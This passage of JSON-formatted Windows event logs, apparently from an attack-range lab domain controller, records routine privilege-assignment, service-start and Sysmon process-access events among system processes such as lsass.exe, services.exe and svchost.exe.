06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220265,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76821,"ProcessID":852,"ThreadID":2632,"Channel":"System","Message":"The vds service entered the running state.","param1":"vds","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76822,"ProcessID":852,"ThreadID":948,"Channel":"System","Message":"The nxlog service entered the running state.","param1":"nxlog","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.131\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.131","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.131\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.131","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.131\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.131","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.147\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.147","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.147\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.147","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.162\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+19dd3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.162","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+19dd3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.162\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.162","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
